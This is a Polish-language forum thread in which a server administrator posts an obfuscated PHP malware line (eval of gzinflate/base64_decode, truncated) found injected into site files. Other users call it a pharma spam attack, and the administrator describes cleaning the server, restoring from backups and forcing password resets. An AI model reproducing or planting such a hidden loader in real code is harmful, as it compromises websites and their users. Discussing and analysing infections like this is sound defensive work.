WTF is this bullshit...
<?php eval(gzinflate(base64_decode('lVltc9pIEv7MVd1/UCjFSDEGSYBtYstONnF2t+qyyRFyVVdxlhrECLQWklYSBGLlv9/TPRLIb3d7qQSGme6efu+eTuBrxrOZ9INIzoyWny7fZi3TvP373xpqs9rT2rZ5hl2ZpnE6SWUSp3kQzQ2Ld3HgryIvD+JIA43JLNQMfZWGpkaUGgEuqc4nchNkeWa0PJxPgijIcZ8Ca+jeQnO13YEiQbc2GryZyTxOcgNgbe3N59E/PnwcT0ZX48+j38aj1799enc1amuKzUZDj1d5RUxupAeGvAUzq/hhgpAmivlAe+a6mmVqJZovwkzWbvbCOJM1Ej80CQDttgR/5QehnMxlPvHiKJcR5GPxz34Q86nMV2mk5WmwNAiBuaAT/K3UwmrzUpIuiFj/DT0I3SxPQxnx3pkeu60W8+THKXgJIJ51puH7HB8hrQ4PSYKOCxpf9OCr9rvWeqFQSh70mAg8djeY94S3kIaeL5NZkLb1MIhu2rq3zIOlbOt5LF3WSsmcj9tL0E6rm8ksm7Q6y9nASFI5JwcJhSeNVvf3RZ4nL6+7190vv193vx52W22thX9M3lQG0X0JaqzD0jt0X50EvvGMTotCIzYMUztiOGbKAJR2oR1b2gut5NMkf...
Tzn. wiem, pierdolony pharma attack ;__;
2014 i dalej infekuje...
@akerro: Verey mad. Czyszcze wlasnie serwer z kodu, skurwiel wbil sie wszedzie, wszystkie sajty na serwerze to maja. Sprawdzam jeszcze baze danych i pliki...
Jebaniec modyfikuje pliki doklejajac tego base_64 i wkleja date modyfikacji jaka byla w oryginalnym pliku ;__;
robie svn diff po rozmiarze.
@akerro: Wtedy tylko chlastac sie czerstwym rogalem po powiekach... Albo przywracac server z obrazu albo kopia plikow z dev :)
@akerro: Caly server poszed do dev/null na wszelki wypadek. Sprawdzilem logi i dziwne sessje zaczely sie pojawiac wczoraj o 21:45. Wyjebalem chama i przywrocilem server z obrazu i baze z kopii. Wszystko wyglada OK a svn diff pokazuje wszystko tak jak ma byc. No to teraz tylko odkryc jak to gowno sie wbilo...
@akerro: no to teraz musze userom dać znać, że passwordy muszą zmienić. Not a big deal. Łącznie jakieś 4k pipol.
@zskk: Sprawdzałem i nic nie wypisuje, wiec to nie to. Co ciekawe na koncu stringu z base_64 był znaczek ctrl+v i nowej lini w dosie/windzie co w kodzie targetującym systemy unixowe raczej sensu nie ma. Jednak mielismy problem z malware w korp_lanie i sie zastanawiam, czy ktos kto edytuje kontent, zrobil kopiuj wklej a to gowno sie doczepilo... a jak juz znalazlo sie na serwerze to zaczelo broic.